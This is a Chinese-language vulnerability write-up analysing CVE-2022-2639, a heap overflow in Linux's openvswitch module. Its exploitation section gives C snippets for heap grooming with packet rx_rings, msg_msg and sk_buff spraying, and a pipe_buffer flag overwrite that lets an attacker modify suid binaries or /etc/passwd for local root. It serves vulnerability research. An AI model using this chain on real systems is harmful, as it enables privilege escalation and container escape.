CVE-2022-2639 openvswitch LPE 漏洞分析

veritas501

2022-10-18 (Updated: 2023-12-08)

kernel

简介

在Linux kernel 的 openvswitch 模块中存在一处由整数溢出导致的堆越界写。成功利用这个漏洞会导致Linux kernel本地提权或是容器逃逸。

漏洞分析

漏洞分析基于Linux kernel 5.13。源码下载：

git clone git://kernel.ubuntu.com/ubuntu/ubuntu-focal.git -b Ubuntu-hwe-5.13-5.13.0-35.40_20.04.1 --depth 1

漏洞本身并不复杂，可以直接看patch：

diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
index 7176156d38443c..4c09cf8a0ab2dc 100644
--- a/net/openvswitch/flow_netlink.c
+++ b/net/openvswitch/flow_netlink.c
@@ -2465,7 +2465,7 @@ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
 	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);
 
 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
-		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
+		if ((next_offset + req_size) > MAX_ACTIONS_BUFSIZE) {
 			OVS_NLERR(log, "Flow action size exceeds max %u",
 				  MAX_ACTIONS_BUFSIZE);
 			return ERR_PTR(-EMSGSIZE);

注意到不等式左边的next_offset为有符号，而右边的req_size为无符号。在两端比大小之前，左边相减的结果可能为负数，随即被cast成无符号与右边比较。如果是负数就会变成很大的正数，从而使check失效。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2338
/* 2338 */ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
/* 2339 */ 				       int attr_len, bool log)
/* 2340 */ {
/* 2341 */ 
/* 2342 */ 	struct sw_flow_actions *acts;
/* 2343 */ 	int new_acts_size;
/* 2344 */ 	size_t req_size = NLA_ALIGN(attr_len);
/* 2345 */ 	int next_offset = offsetof(struct sw_flow_actions, actions) +
/* 2346 */ 					(*sfa)->actions_len;
------
/* 2351 */ 	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);
/* 2352 */ 
/* 2353 */ 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
/* 2354 */ 		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
/* 2355 */ 			OVS_NLERR(log, "Flow action size exceeds max %u",
/* 2356 */ 				  MAX_ACTIONS_BUFSIZE);
/* 2357 */ 			return ERR_PTR(-EMSGSIZE);
/* 2358 */ 		}

而MAX_ACTIONS_BUFSIZE的大小为0x8000，即如果能够让next_offset大于0x8000就能绕过判断。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2275
/* 2275 */ #define MAX_ACTIONS_BUFSIZE	(32 * 1024)

绕过判断就会顺势执行到2359行，new_acts_size被赋值为0x8000，之后在2362行分配新buffer，并在2366行将内容拷贝到新申请的buffer中。并最终返回buffer+next_offset的地址。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2353
/* 2353 */ 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
/* 2354 */ 		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
------
/* 2358 */ 		}
/* 2359 */ 		new_acts_size = MAX_ACTIONS_BUFSIZE;
/* 2360 */ 	}
/* 2361 */ 
/* 2362 */ 	acts = nla_alloc_flow_actions(new_acts_size);
------
/* 2366 */ 	memcpy(acts->actions, (*sfa)->actions, (*sfa)->actions_len);
/* 2367 */ 	acts->actions_len = (*sfa)->actions_len;
/* 2368 */ 	acts->orig_len = (*sfa)->orig_len;
/* 2369 */ 	kfree(*sfa);
/* 2370 */ 	*sfa = acts;
/* 2371 */ 
/* 2372 */ out:
/* 2373 */ 	(*sfa)->actions_len += req_size;
/* 2374 */ 	return  (struct nlattr *) ((unsigned char *)(*sfa) + next_offset);
/* 2375 */ }

来到调用reserve_sfa_size()的外层，3027行的to已经带上了前面的offset，并最后在3031行的memcpy处发生堆越界写。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3021
/* 3021 */ static int copy_action(const struct nlattr *from,
/* 3022 */ 		       struct sw_flow_actions **sfa, bool log)
/* 3023 */ {
/* 3024 */ 	int totlen = NLA_ALIGN(from->nla_len);
/* 3025 */ 	struct nlattr *to;
/* 3026 */ 
/* 3027 */ 	to = reserve_sfa_size(sfa, from->nla_len, log);
------
    		// heap buffer oob write
/* 3031 */ 	memcpy(to, from, totlen);

Just a BUG ??

搞清楚了这个bug的成因后，便是开始尝试编写POC证明这里的确能够溢出，而不是停留于“理论上”。而这显然没有想象中那么容易。

首先我们需要更多的信息！读更多的源码！

看一下分配之前buffer的函数，其实就是简单的使用kmalloc，包含一个struct sw_flow_actions的header，后面紧跟着buffer。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2277
    		// Allocates one kmalloc() object holding a struct sw_flow_actions
    		// header followed by `size` bytes of action buffer.
    		// Returns the object with actions_len set to 0, or ERR_PTR(-ENOMEM).
/* 2277 */ static struct sw_flow_actions *nla_alloc_flow_actions(int size)
/* 2278 */ {
/* 2279 */ 	struct sw_flow_actions *sfa;
/* 2280 */ 
    		// Only warns on an oversized request; the allocation below still runs.
/* 2281 */ 	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);
/* 2282 */ 
    		// Header and buffer share one allocation: sizeof(*sfa) + size bytes.
/* 2283 */ 	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);
/* 2284 */ 	if (!sfa)
/* 2285 */ 		return ERR_PTR(-ENOMEM);
/* 2286 */ 
    		// A fresh buffer starts with no actions stored in it.
/* 2287 */ 	sfa->actions_len = 0;
/* 2288 */ 	return sfa;
/* 2289 */ }

sizeof(struct sw_flow_actions)为0x20，再由于对齐，所以并不会分配0x8020的chunk，而是分配了0x10000的chunk（注意这里的0x10000）。

同时我还发现，openvswitch通过netlink进行通信。而这之中用到了名为nlattr的结构体：

/*
 *  <------- NLA_HDRLEN ------> <-- NLA_ALIGN(payload)-->
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 * |        Header       | Pad |     Payload       | Pad |
 * |   (struct nlattr)   | ing |                   | ing |
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 *  <-------------- nlattr->nla_len -------------->
 */

struct nlattr {
	/* 16-bit attribute length; per the layout diagram it spans the header and the payload. */
	__u16           nla_len;
	/* 16-bit attribute type (presumably the value nla_type() returns -- confirm). */
	__u16           nla_type;
};

注意这里的header和payload都需要按NLA_ALIGNTO对齐（不足的部分用padding补齐），而这个对齐粒度为4bytes。

#define NLA_ALIGNTO		4
#define NLA_ALIGN(len)		(((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))

此外，也是最最重要的，len字段为u16类型，也就是说我们的payload撑死就只有0xFFFF的大小，而前面在申请buffer时分配了0x10000的chunk，看起来完全没法溢出啊。

有人可能在想，那一个不行，能不能连续用两个？还是不行。

因为前面说到openvswitch模块使用netlink进行通信，所以首先需要遵守netlink通信时的数据结构，也就是struct nlmsghdr这个header。之后，netlink又有很多种类，可以在netlink.h中找到定义：

#define NETLINK_ROUTE		0	/* Routing/device hook				*/
#define NETLINK_UNUSED		1	/* Unused number				*/
#define NETLINK_USERSOCK	2	/* Reserved for user mode socket protocols 	*/
#define NETLINK_FIREWALL	3	/* Unused number, formerly ip_queue		*/
#define NETLINK_SOCK_DIAG	4	/* socket monitoring				*/
#define NETLINK_NFLOG		5	/* netfilter/iptables ULOG */
......
#define NETLINK_IP6_FW		13
#define NETLINK_DNRTMSG		14	/* DECnet routing messages */
#define NETLINK_KOBJECT_UEVENT	15	/* Kernel messages to userspace */
#define NETLINK_GENERIC		16
......

而我们的openvswitch属于NETLINK_GENERIC，因此在struct nlmsghdr中还得包着struct genlmsghdr；再在这里面才是喂给openvswitch的数据，也就是前面提到的struct nlattr。而前面的漏洞位于拷贝flow actions的场景中，而 flow actions 又是主struct nlattr中的一个子struct nlattr。

因此在这种层层限制下，第一层nlattr的长度就已经不超过0xFFFF了，那自然子nlattr的长度之和也没法超过0x10000了。

看起来确实没戏了？？

It’s a vulnerability !!

在__ovs_nla_copy_actions()中有如下一段代码，描述了各个action attr的数据长度，其中-1表示不定长，否则为定长。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3047
/* 3047 */ 		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
/* 3048 */ 			[OVS_ACTION_ATTR_OUTPUT] = sizeof(u32),
/* 3049 */ 			[OVS_ACTION_ATTR_RECIRC] = sizeof(u32),
/* 3050 */ 			[OVS_ACTION_ATTR_USERSPACE] = (u32)-1,
/* 3051 */ 			[OVS_ACTION_ATTR_PUSH_MPLS] = sizeof(struct ovs_action_push_mpls),
/* 3052 */ 			[OVS_ACTION_ATTR_POP_MPLS] = sizeof(__be16),
/* 3053 */ 			[OVS_ACTION_ATTR_PUSH_VLAN] = sizeof(struct ovs_action_push_vlan),
/* 3054 */ 			[OVS_ACTION_ATTR_POP_VLAN] = 0,
/* 3055 */ 			[OVS_ACTION_ATTR_SET] = (u32)-1,
/* 3056 */ 			[OVS_ACTION_ATTR_SET_MASKED] = (u32)-1,
/* 3057 */ 			[OVS_ACTION_ATTR_SAMPLE] = (u32)-1,
/* 3058 */ 			[OVS_ACTION_ATTR_HASH] = sizeof(struct ovs_action_hash),
/* 3059 */ 			[OVS_ACTION_ATTR_CT] = (u32)-1,
/* 3060 */ 			[OVS_ACTION_ATTR_CT_CLEAR] = 0,
/* 3061 */ 			[OVS_ACTION_ATTR_TRUNC] = sizeof(struct ovs_action_trunc),
/* 3062 */ 			[OVS_ACTION_ATTR_PUSH_ETH] = sizeof(struct ovs_action_push_eth),
/* 3063 */ 			[OVS_ACTION_ATTR_POP_ETH] = 0,
/* 3064 */ 			[OVS_ACTION_ATTR_PUSH_NSH] = (u32)-1,
/* 3065 */ 			[OVS_ACTION_ATTR_POP_NSH] = 0,
/* 3066 */ 			[OVS_ACTION_ATTR_METER] = sizeof(u32),
/* 3067 */ 			[OVS_ACTION_ATTR_CLONE] = (u32)-1,
/* 3068 */ 			[OVS_ACTION_ATTR_CHECK_PKT_LEN] = (u32)-1,
/* 3069 */ 			[OVS_ACTION_ATTR_ADD_MPLS] = sizeof(struct ovs_action_add_mpls),
/* 3070 */ 			[OVS_ACTION_ATTR_DEC_TTL] = (u32)-1,
/* 3071 */ 		};

一般来说，我们传入的子nlattr和最后add action中的长度是一致的，比如上面的OVS_ACTION_ATTR_PUSH_MPLS，它的长度固定为sizeof(struct ovs_action_push_mpls)，简单做一下校验就会传入通用的copy_action()函数中，因为skip_copy = false。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:3081
/* 3081 */ 		skip_copy = false;
/* 3082 */ 		switch (type) {
------
/* 3165 */ 		case OVS_ACTION_ATTR_PUSH_MPLS: {
/* 3166 */ 			const struct ovs_action_push_mpls *mpls = nla_data(a);
/* 3167 */ 
/* 3168 */ 			if (!eth_p_mpls(mpls->mpls_ethertype))
/* 3169 */ 				return -EINVAL;
/* 3170 */ 			/* Prohibit push MPLS other than to a white list
/* 3171 */ 			 * for packets that have a known tag order.
/* 3172 */ 			 */
/* 3173 */ 			if (vlan_tci & htons(VLAN_CFI_MASK) ||
/* 3174 */ 			    (eth_type != htons(ETH_P_IP) &&
/* 3175 */ 			     eth_type != htons(ETH_P_IPV6) &&
/* 3176 */ 			     eth_type != htons(ETH_P_ARP) &&
/* 3177 */ 			     eth_type != htons(ETH_P_RARP) &&
/* 3178 */ 			     !eth_p_mpls(eth_type)))
/* 3179 */ 				return -EINVAL;
/* 3180 */ 			eth_type = mpls->mpls_ethertype;
/* 3181 */ 			mpls_label_count++;
/* 3182 */ 			break;
/* 3183 */ 		}
------
/* 3344 */ 		if (!skip_copy) {
/* 3345 */ 			err = copy_action(a, sfa, log);
/* 3346 */ 			if (err)
/* 3347 */ 				return err;
/* 3348 */ 		}

但通过仔细观察，其中有若干特例，例如OVS_ACTION_ATTR_CT可以拿来利用，首先它设置了skip_copy = true，说明copy action它会在ovs_ct_copy_action()中自己来拷贝。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3246
/* 3246 */ 		case OVS_ACTION_ATTR_CT:
/* 3247 */ 			err = ovs_ct_copy_action(net, a, key, sfa, log);
/* 3248 */ 			if (err)
/* 3249 */ 				return err;
/* 3250 */ 			skip_copy = true;
/* 3251 */ 			break;

// >>> linux-5.13/net/openvswitch/conntrack.c:1667
/* 1667 */ int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
/* 1668 */ 		       const struct sw_flow_key *key,
/* 1669 */ 		       struct sw_flow_actions **sfa,  bool log)
/* 1670 */ {
/* 1671 */ 	struct ovs_conntrack_info ct_info;
------
/* 1688 */ 	err = parse_ct(attr, &ct_info, &helper, log);
------
/* 1716 */ 	err = ovs_nla_add_action(sfa, OVS_ACTION_ATTR_CT, &ct_info,
/* 1717 */ 				 sizeof(ct_info), log);

而在parse_ct()中，我们只需要8字节就能构造出合法的nlattr。而在1716行add action时传入的结构体却是struct ovs_conntrack_info，且大小为sizeof(struct ovs_conntrack_info)。

这个结构体在 Kernel 5.13 中为0xA0字节，这就起到了放大的作用！

假设我们添加500个OVS_ACTION_ATTR_CT的nlattr，那只用了500*8 = 0xFA0字节的nlattr长度，却让我们最前面提到的buffer的next_offset成功增加了500*0xa0 = 0x13880字节！溢出发生！！

但使用struct ovs_conntrack_info对编写exploit有个坏处，就是这个结构体在内核版本的更迭中被修改过多次，导致在不同版本的内核其大小并不固定。

为了解决这个痛点，只能去寻找其他的结构体，然后，我找到了OVS_ACTION_ATTR_SET。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3217
/* 3217 */ 		case OVS_ACTION_ATTR_SET:
/* 3218 */ 			err = validate_set(a, key, sfa,
/* 3219 */ 					   &skip_copy, mac_proto, eth_type,
/* 3220 */ 					   false, log);
/* 3221 */ 			if (err)
/* 3222 */ 				return err;
/* 3223 */ 			break;

这里看起来没有主动设置skip_copy，但仔细看会发现它将skip_copy的指针传递给了validate_set()，由后者进行处理。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:2744
/* 2744 */ static int validate_set(const struct nlattr *a,
/* 2745 */ 			const struct sw_flow_key *flow_key,
/* 2746 */ 			struct sw_flow_actions **sfa, bool *skip_copy,
/* 2747 */ 			u8 mac_proto, __be16 eth_type, bool masked, bool log)
/* 2748 */ {
    		// 取出内层嵌套的nlattr
/* 2749 */ 	const struct nlattr *ovs_key = nla_data(a);
/* 2750 */ 	int key_type = nla_type(ovs_key);
/* 2751 */ 	size_t key_len;
------
    		// data length 作为 key_len
/* 2757 */ 	key_len = nla_len(ovs_key);
    		// 从OVS_ACTION_ATTR_SET走不设置masked
/* 2758 */ 	if (masked)
/* 2759 */ 		key_len /= 2;
------
    		// 注意这里的check_attr_len(), key_len 不是随便给的
/* 2761 */ 	if (key_type > OVS_KEY_ATTR_MAX ||
/* 2762 */ 	    !check_attr_len(key_len, ovs_key_lens[key_type].len))
/* 2763 */ 		return -EINVAL;
------
/* 2768 */ 	switch (key_type) {
------
    		// 对 key_type == OVS_KEY_ATTR_ETHERNET 来说只是简单的check
/* 2775 */ 	case OVS_KEY_ATTR_ETHERNET:
/* 2776 */ 		if (mac_proto != MAC_PROTO_ETHERNET)
/* 2777 */ 			return -EINVAL;
/* 2778 */ 		break;
------
/* 2883 */ 	}
/* 2884 */ 
    		// 进入这段关键逻辑
/* 2885 */ 	/* Convert non-masked non-tunnel set actions to masked set actions. */
/* 2886 */ 	if (!masked && key_type != OVS_KEY_ATTR_TUNNEL) {
    			// 注意到len为key_len的两倍
/* 2887 */ 		int start, len = key_len * 2;
/* 2888 */ 		struct nlattr *at;
/* 2889 */ 
    			// 设置 skip_copy， 跳过外层的默认的copy_action
/* 2890 */ 		*skip_copy = true;
/* 2891 */ 
/* 2892 */ 		start = add_nested_action_start(sfa,
/* 2893 */ 						OVS_ACTION_ATTR_SET_TO_MASKED,
/* 2894 */ 						log);
/* 2895 */ 		if (start < 0)
/* 2896 */ 			return start;
/* 2897 */ 
    			// 调用__add_action， 注意此处的len为key_len两倍
/* 2898 */ 		at = __add_action(sfa, key_type, NULL, len, log);
/* 2899 */ 		if (IS_ERR(at))
/* 2900 */ 			return PTR_ERR(at);
/* 2901 */ 
/* 2902 */ 		memcpy(nla_data(at), nla_data(ovs_key), key_len); /* Key. */
/* 2903 */ 		memset(nla_data(at) + key_len, 0xff, key_len);    /* Mask. */

假设我们内部嵌套的nlattr type为OVS_KEY_ATTR_ETHERNET，首先要通过2762行对data length的校验，即length等于sizeof(struct ovs_key_ethernet) == 0x0C。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:406
/* 406 */ /* The size of the argument for each %OVS_KEY_ATTR_* Netlink attribute.  */
/* 407 */ static const struct ovs_len_tbl ovs_key_lens[OVS_KEY_ATTR_MAX + 1] = {
------
/* 412 */ 	[OVS_KEY_ATTR_ETHERNET]	 = { .len = sizeof(struct ovs_key_ethernet) },

之后关键逻辑出现在第2887行，最后添加的action长度为原长的两倍，即0x18。

算上添加这个nlattr所需的两层header（嵌套），即需要使用0x04 + 0x04 + 0x0C == 0x14字节的内存就让最前面提出的buffer的指针前进0x04 + 0x04 + 0x0C * 2 == 0x20字节。虽然放大比例不如sizeof(struct ovs_conntrack_info)，但好在其在能用来溢出的前提下，保证了更优的稳定性（无需根据内核版本来计算结构体的大小）。

可以在copy_action()的memcpy处（3031行）观察到此次溢出。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3021
    		// Appends a copy of the netlink attribute `from` to the action buffer *sfa.
    		// Returns 0 on success, or the error carried by the pointer that
    		// reserve_sfa_size() returned.
/* 3021 */ static int copy_action(const struct nlattr *from,
/* 3022 */ 		       struct sw_flow_actions **sfa, bool log)
/* 3023 */ {
    		// Bytes to copy: the attribute length rounded up by NLA_ALIGN().
/* 3024 */ 	int totlen = NLA_ALIGN(from->nla_len);
/* 3025 */ 	struct nlattr *to;
/* 3026 */ 
    		// `to` is the destination slot for this attribute inside *sfa.
/* 3027 */ 	to = reserve_sfa_size(sfa, from->nla_len, log);
/* 3028 */ 	if (IS_ERR(to))
/* 3029 */ 		return PTR_ERR(to);
/* 3030 */ 
    		// Copies totlen bytes to `to` with no further bounds check in this function.
/* 3031 */ 	memcpy(to, from, totlen);
/* 3032 */ 	return 0;
/* 3033 */ }

漏洞利用

在POC中我们可以清晰的看到heap上发生了buffer overflow，且溢出发生在0x10000的堆块上。

根据之前漏洞利用的经验，我还是打算请出我的老朋友struct msg_msg。但相信有点经验的朋友都会发现，msg最大只能申请0x1000的chunk，完全不是一个量级，也不在一个slab中。因此如果只是简单的堆喷msg_msg结构体并不能保证发生溢出的0x10000堆块后正好紧跟着struct msg_msg。

因此这里需要一些page level的风水技巧。这边非常感谢@etenal在CVE-2022-27666中提供的思路。某些原理和常识请移步etenal的分析，下面我直接讲我的操作。

首先介绍这次的风水好帮手packet rx_ring buffer，它能够帮助我们申请0x10000的chunk且在需要释放的时候释放。它的申请位置如下：

// >>> linux-5.13/net/packet/af_packet.c:3695
/* 3695 */ static int
/* 3696 */ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
/* 3697 */ 		  unsigned int optlen)
/* 3698 */ {
------
/* 3706 */ 	switch (optname) {
------
/* 3711 */ 		int len = optlen;
------
/* 3728 */ 	case PACKET_RX_RING:
/* 3729 */ 	case PACKET_TX_RING:
/* 3730 */ 	{
------
/* 3735 */ 		switch (po->tp_version) {
------
/* 3740 */ 		case TPACKET_V3:
------
    					// call here
/* 3751 */ 				ret = packet_set_ring(sk, &req_u, 0,
/* 3752 */ 						    optname == PACKET_TX_RING);

        
// >>> linux-5.13/net/packet/af_packet.c:4306
/* 4306 */ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
/* 4307 */ 		int closing, int tx_ring)
/* 4308 */ {
------
/* 4331 */ 	if (req->tp_block_nr) {
------
/* 4376 */ 		order = get_order(req->tp_block_size);
				// call here
/* 4377 */ 		pg_vec = alloc_pg_vec(req, order);

    
// >>> linux-5.13/net/packet/af_packet.c:4281
/* 4281 */ static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
/* 4282 */ {
/* 4283 */ 	unsigned int block_nr = req->tp_block_nr;
------
/* 4287 */ 	pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
------
/* 4291 */ 	for (i = 0; i < block_nr; i++) {
    			// alloc buffer !!!
/* 4292 */ 		pg_vec[i].buffer = alloc_one_pg_vec_page(order);

使用例子：

#include <linux/if_packet.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>

/*
 * Select TPACKET_V3 on packet socket `s`, then install a PACKET_RX_RING
 * described by the arguments.
 *
 *   block_size  - value for tp_block_size
 *   frame_size  - value for tp_frame_size (also the divisor for tp_frame_nr)
 *   block_nr    - value for tp_block_nr
 *   sizeof_priv - value for tp_sizeof_priv
 *   timeout     - value for tp_retire_blk_tov
 *
 * die() is called when either setsockopt() fails.
 */
void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int version = TPACKET_V3;
    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    /* Members not named here are zero-initialized. */
    struct tpacket_req3 ring = {
        .tp_block_size = block_size,
        .tp_block_nr = block_nr,
        .tp_frame_size = frame_size,
        .tp_frame_nr = (block_size * block_nr) / frame_size,
        .tp_retire_blk_tov = timeout,
        .tp_sizeof_priv = sizeof_priv,
        .tp_feature_req_word = 0,
    };

    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

/*
 * Create an AF_PACKET/SOCK_RAW socket, attach an RX ring to it through
 * packet_socket_rx_ring_init(), and bind it to the "lo" interface.
 *
 * The ring parameters are forwarded unchanged. Returns the socket
 * descriptor; die() is called when socket() or bind() fails.
 */
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sock < 0) {
        die("socket(AF_PACKET): %m");
    }

    /* The ring is installed before the socket is bound. */
    packet_socket_rx_ring_init(sock, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    /* Members not named here (e.g. sll_addr) are zero-initialized. */
    struct sockaddr_ll lo_addr = {
        .sll_family = PF_PACKET,
        .sll_protocol = htons(ETH_P_ALL),
        .sll_ifindex = if_nametoindex("lo"),
        .sll_hatype = 0,
        .sll_pkttype = 0,
        .sll_halen = 0,
    };

    if (bind(sock, (struct sockaddr *)&lo_addr, sizeof(lo_addr)) < 0) {
        die("bind(AF_PACKET): %m");
    }

    return sock;
}

/*
 * Set up a packet socket whose RX ring has `count` blocks of `size` bytes
 * each, using a fixed frame size, no private area and a fixed retire timeout.
 * Returns the descriptor produced by packet_socket_setup().
 */
int pagealloc_pad(int count, int size) {
    const unsigned int frame_size = 2048;
    const unsigned int sizeof_priv = 0;
    const int timeout = 100;

    return packet_socket_setup(size, frame_size, count, sizeof_priv, timeout);
}

int fd;

fd = pagealloc_pad(1, 0x10000) // 分配一个0x10000的chunk
close(fd) // 释放 chunk
    
fd = pagealloc_pad(100, 0x1000) // 分配 100 个 0x1000 的chunk
close(fd) // 一次性释放这个100个chunk

那么首先，我们用这个技巧把内核的堆整理一下，尽可能把freelist中的堆块都用完。

logd("do heap fengshui to reduce noise ...");
pagealloc_pad(1000, 0x1000);
pagealloc_pad(500, 0x2000);
pagealloc_pad(200, 0x4000);
pagealloc_pad(200, 0x8000);
pagealloc_pad(100, 0x10000);

接着，我们申请一些0x10000的堆块，由于刚整理过堆，因此内核中并不存在0x10000的空闲堆块，便会从order 5(0x20000)申请内存并分割成两个order 4(0x10000)。因此这里分配的0x10000的堆块地址极大概率是相连的。

之后我们每隔一个释放一个，由于从order 5分割出来的两个堆块并不同时处于freelist中，因此并没有被合并到order 5，而是停留在freelist中，从而大概率得到如下的堆布局：

#define fengshui_skfd_cnt (0x20)

int fengshui_skfd[fengshui_skfd_cnt];
for (int i = 0; i < fengshui_skfd_cnt; i++) {
	fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
}
for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
	close(fengshui_skfd[i]);
	fengshui_skfd[i] = -1;
}

接着我们堆喷struct msg_msg，包含一个0x1000的struct msg_msg和一个0x400的struct msg_msgseg。那么由于之前把堆清理干净了，这个放在freelist里的0x10000堆块就会被层层分割，提供给这两个结构体用。那大概率，这个0x10000堆块后面就会紧跟着一个struct msg_msg。

接着，我们把刚才留着的另一半rx_ring buffer也释放掉，依然因为两个order 4堆块不同时存在于freelist中，所以没有向上合并到order5而是停留在freelist中。

再调用前面的POC，struct nlattr自然落在了n个如上结构中的free堆块处，从而触发堆溢出修改相连msg的m_ts字段。

这样，我们就可以通过在msgrcv时使用MSG_COPY flag 来泄露struct msg_msgseg后面的数据。

大多数情况我们遇到这个msgseg后面正好跟着是另一个msg队列中的msgseg，从而根据预先写在msg buffer中的记号识别出对应的msg队列并释放它。随后另起一堆msg队列，且每个队列中塞16个0x400的msg，去占用释放的这个堆块。

队列如下：

借助上面被修改了m_ts的msg，我们再次越界读，这次读取到了B的next指针，从而知道了C的地址。

记住这个C，后面要用来UAF！！

我们故技重施，再次得到如下的结构，并调用POC代码触发堆溢出写，但这次我们修改的字段不是m_ts，而是m_list.next。刚才我们得到msg C的地址，我们将修改的m_list.next指针也指向它。

此时，我们通过C所在的msg队列将C释放，B和C处于同一队列，因此B中的next指针会由于正常的unlink被改掉，但由于A的m_list.next是我们修改的，不会由于unlink修改，从而得到了一个0x400 chunk的UAF。

接着再堆喷sk_buff->data，希望有一个sk_buff->data能够占用msg C的chunk。

稍微提一下，这个sk_buff->data是用于socket中的UDP的，大小为0x180~0x1000，前面是用户可控数据，后面0x140是struct skb_shared_info，且分配的flag为GFP_KERNEL_ACCOUNT。

由于sk_buff->data结构体的特性，我们可以伪造一个合法的msg头部出来：

这下，我们再通过msg A所在队列将sk_buff->data所在chunk 释放，得到一个sk_buff->data的UAF。

接着再堆喷struct pipe_buffer，指望能有一个pipe buffer和skbuff data共用一个chunk。且同时操作pipe，打开目标suid文件，并做好splice操作：

#define ATTACK_FILE "/usr/bin/mount"

// filled with pipe_buffer
logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
int attack_fd = open(ATTACK_FILE, O_RDONLY);
if (attack_fd < 0) {
    die("open %s: %m", ATTACK_FILE);
}
for (int i = 0; i < NUM_PIPES; i++) {
    if (pipe(pipes[i])) {
        die("alloc pipe failed");
    }

    // Put ordinary data into the pipe first. The length differs per pipe
    // (0x100 + i) -- presumably so a leaked pipe_buffer can be matched to
    // its pipe; confirm against the leak-parsing code.
    // A failed or short write would leave the pipe without this first
    // buffer, so it is treated as fatal instead of being ignored.
    const ssize_t fill_len = 0x100 + i;
    if (write(pipes[i][1], buff, fill_len) != fill_len) {
        die("write() to pipe failed");
    }

    // Splice exactly one byte of the target file (file offset 1) into the
    // pipe. splice() returns 0 when nothing was transferred, which would
    // leave no file-backed buffer in the pipe, so anything other than 1
    // is an error.
    loff_t offset = 1;
    ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
    if (nbytes != 1) {
        die("splice() failed");
    }
}

这样就能 free skbuff data，泄露整个pipe buffer结构体，并转化为pipe buffer的UAF。

下一步很关键！因为我们并不需要泄露ops字段，而是直接奔着flags去。

因为我们并不做ROP，而是将其转化为类似DirtyPipe的场景，我们知道自从DirtyPipe被修复后，使用splice()时flags会被重新设置为0，而我们的目标就是将这个flags再次修改为PIPE_BUF_FLAG_CAN_MERGE，从而将DirtyPipe作为和ROP同级别的原语来使用，只不过后者是内核任意代码执行，而前者是任意文件修改，它们都能让我们得到本地权限提升。

具体可以参考 https://github.com/veritas501/pipe-primitive

在 kernel >= 5.8 中需要修改 pipe buffer 中 splice 页的flag |= PIPE_BUF_FLAG_CAN_MERGE即可（有能力可以顺便把offset和len改成0，这样就能从文件的开头开始写）；在 kernel < 5.8 中，需要先leak一下pipe_buffer中的anon_pipe_ops，然后将 splice 页的ops改为anon_pipe_ops（因为<5.8版本中能否merge是看ops的）（有能力依然可以顺便把offset和len改成0）。

logd("edit pipe_buffer->flags");
{
    /* Start from a zeroed buffer holding the previously saved pipe_buffer bytes. */
    memset(buff, 0, sizeof(buff));
    memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));

    /* View the buffer as an array of pipe_buffer entries: entry 0 supplies
     * the ops pointer, entry 1 is the one being patched. */
    struct typ_pipe_buffer *fake = (struct typ_pipe_buffer *)buff;
    struct typ_pipe_buffer *donor_slot = &fake[0];
    struct typ_pipe_buffer *patched_slot = &fake[1];

    patched_slot->ops = donor_slot->ops; // for kernel < 5.8
    patched_slot->offset = 0;
    patched_slot->len = 0;
    patched_slot->flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8

    spray_skbuff_data(buff, 0x400 - 0x140);
    hexdump(buff, 2 * sizeof(struct typ_pipe_buffer));
}

从而下次对pipe写入就会修改文件的page cache，得到和DirtyPipe一样任意文件写的能力！对本地提权来说只要修改suid程序的内容或是修改/etc/passwd即可。

通过pipe原语，我们就可以无需ROP从而得到一份几乎不用做版本适配的通用内核exploit代码，非常的完美。